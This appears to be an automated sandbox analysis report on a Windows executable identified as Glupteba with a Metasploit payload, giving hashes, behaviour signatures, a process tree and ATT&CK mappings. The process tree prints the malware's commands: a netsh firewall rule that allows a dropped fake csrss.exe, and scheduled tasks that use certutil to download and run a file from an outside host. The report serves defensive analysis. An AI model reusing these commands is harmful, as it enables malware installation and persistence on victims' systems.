Analysis

  • max time kernel
    154s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    29-01-2023 18:32

General

  • Target

    5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1.exe

  • Size

    3.9MB

  • MD5

    af424c205619015d4f10b6f0454400dc

  • SHA1

    fd770c56d4825035ed4bd9aa396fa958d23c5b1d

  • SHA256

    5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1

  • SHA512

    f9094d8471b2a04bd9ab0b814498f7f2e0c827fed649a1093f728bac97bf80e0506242415ef7a5948377785ecd52d83d6d883f734e04879cac4d90cc7ae1d09e

  • SSDEEP

    98304:LarFN60kk2reyIYTHhIFUNCHLjqSSNH8WGb1:LGB8dhIFUNIYGb1

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1.exe
    "C:\Users\Admin\AppData\Local\Temp\5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1720
    • C:\Users\Admin\AppData\Local\Temp\5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1.exe
      "C:\Users\Admin\AppData\Local\Temp\5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1056
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:840
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1964
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1748
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193401.log C:\Windows\Logs\CBS\CbsPersist_20230129193401.cab
    1⤵
      PID:276

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Modify Existing Service

    1
    T1031

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Disabling Security Tools

    2
    T1089

    Modify Registry

    4
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\rss\csrss.exe
      Filesize

      3.9MB

      MD5

      af424c205619015d4f10b6f0454400dc

      SHA1

      fd770c56d4825035ed4bd9aa396fa958d23c5b1d

      SHA256

      5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1

      SHA512

      f9094d8471b2a04bd9ab0b814498f7f2e0c827fed649a1093f728bac97bf80e0506242415ef7a5948377785ecd52d83d6d883f734e04879cac4d90cc7ae1d09e

    • \Windows\rss\csrss.exe
      Filesize

      3.9MB

      MD5

      af424c205619015d4f10b6f0454400dc

      SHA1

      fd770c56d4825035ed4bd9aa396fa958d23c5b1d

      SHA256

      5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1

      SHA512

      f9094d8471b2a04bd9ab0b814498f7f2e0c827fed649a1093f728bac97bf80e0506242415ef7a5948377785ecd52d83d6d883f734e04879cac4d90cc7ae1d09e

    • \Windows\rss\csrss.exe
      Filesize

      3.9MB

      MD5

      af424c205619015d4f10b6f0454400dc

      SHA1

      fd770c56d4825035ed4bd9aa396fa958d23c5b1d

      SHA256

      5fcb3a8f817a21f106aef4b565693051e8739bf7290709e340eac773eb8476e1

      SHA512

      f9094d8471b2a04bd9ab0b814498f7f2e0c827fed649a1093f728bac97bf80e0506242415ef7a5948377785ecd52d83d6d883f734e04879cac4d90cc7ae1d09e

    • memory/840-65-0x000007FEFC131000-0x000007FEFC133000-memory.dmp
      Filesize

      8KB

    • memory/840-64-0x0000000000000000-mapping.dmp
    • memory/1056-61-0x0000000000000000-mapping.dmp
    • memory/1472-69-0x0000000000000000-mapping.dmp
    • memory/1472-71-0x00000000026A0000-0x0000000002A48000-memory.dmp
      Filesize

      3.7MB

    • memory/1472-76-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1472-75-0x00000000026A0000-0x0000000002A48000-memory.dmp
      Filesize

      3.7MB

    • memory/1472-74-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1472-73-0x00000000026A0000-0x0000000002A48000-memory.dmp
      Filesize

      3.7MB

    • memory/1720-58-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1720-57-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1720-56-0x00000000029B0000-0x00000000031B4000-memory.dmp
      Filesize

      8.0MB

    • memory/1720-54-0x0000000002600000-0x00000000029A8000-memory.dmp
      Filesize

      3.7MB

    • memory/1720-55-0x0000000002600000-0x00000000029A8000-memory.dmp
      Filesize

      3.7MB

    • memory/1720-59-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1976-66-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1976-72-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1976-60-0x00000000024D0000-0x0000000002878000-memory.dmp
      Filesize

      3.7MB

    • memory/1976-63-0x0000000000400000-0x0000000000C1E000-memory.dmp
      Filesize

      8.1MB

    • memory/1976-62-0x00000000024D0000-0x0000000002878000-memory.dmp
      Filesize

      3.7MB